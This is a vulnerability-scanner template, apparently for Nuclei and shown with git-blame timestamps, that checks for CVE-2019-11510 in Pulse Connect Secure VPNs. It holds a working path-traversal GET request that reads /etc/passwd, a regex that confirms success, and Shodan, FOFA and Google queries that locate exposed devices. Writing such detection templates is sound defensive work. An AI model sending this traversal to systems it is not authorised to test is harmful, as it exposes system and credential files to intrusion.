2021-01-02 04:59:06 +00:00
id : CVE-2019-11510
2020-04-22 06:42:01 +00:00
info :
2022-04-01 08:51:42 +00:00
name : Pulse Connect Secure SSL VPN Arbitrary File Read
2020-04-22 06:42:01 +00:00
author : organiccrap
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-17 09:18:12 +00:00
description : Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can access sensitive information stored on the system, potentially leading to further compromise.
2023-09-06 12:53:28 +00:00
remediation : |
Apply the latest security patches and updates provided by Pulse Secure.
2022-04-01 08:51:42 +00:00
reference :
- https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
- https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
- https://nvd.nist.gov/vuln/detail/CVE-2019-11510
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/154231/Pulse-Secure-SSL-VPN-File-Disclosure-NSE.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2022-05-17 09:18:12 +00:00
cvss-score : 10
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-11510
cwe-id : CWE-22
2024-01-29 17:11:14 +00:00
epss-score : 0.97267
epss-percentile : 0.99828
2024-01-14 13:49:27 +00:00
cpe : cpe:2.3:a:ivanti:connect_secure:9.0:r1:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2024-01-14 13:49:27 +00:00
vendor : ivanti
product : connect_secure
2024-06-07 10:04:29 +00:00
shodan-query :
- http.html:"welcome.cgi?p=logo"
- http.title:"ivanti connect secure"
fofa-query :
- body="welcome.cgi?p=logo"
- title="ivanti connect secure"
2024-05-31 19:23:20 +00:00
google-query : intitle:"ivanti connect secure"
2024-06-07 10:04:29 +00:00
tags : packetstorm,cve,cve2019,pulsesecure,lfi,kev,ivanti
2020-05-25 07:49:06 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-04-22 06:42:01 +00:00
- method : GET
path :
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
2023-07-11 19:49:27 +00:00
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-22 06:42:01 +00:00
matchers :
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2020-04-22 06:42:01 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4a0a0047304502203cb09d5fcff94c6163b87658b3fdc7e6e18e972e859425a541c521543a2e5f2b022100e5e8e743f385d0126a8f435ef7dd64fdf54130d31f622f09bef068fbfc616479:922c64590222798bb761d5b6d8e72950
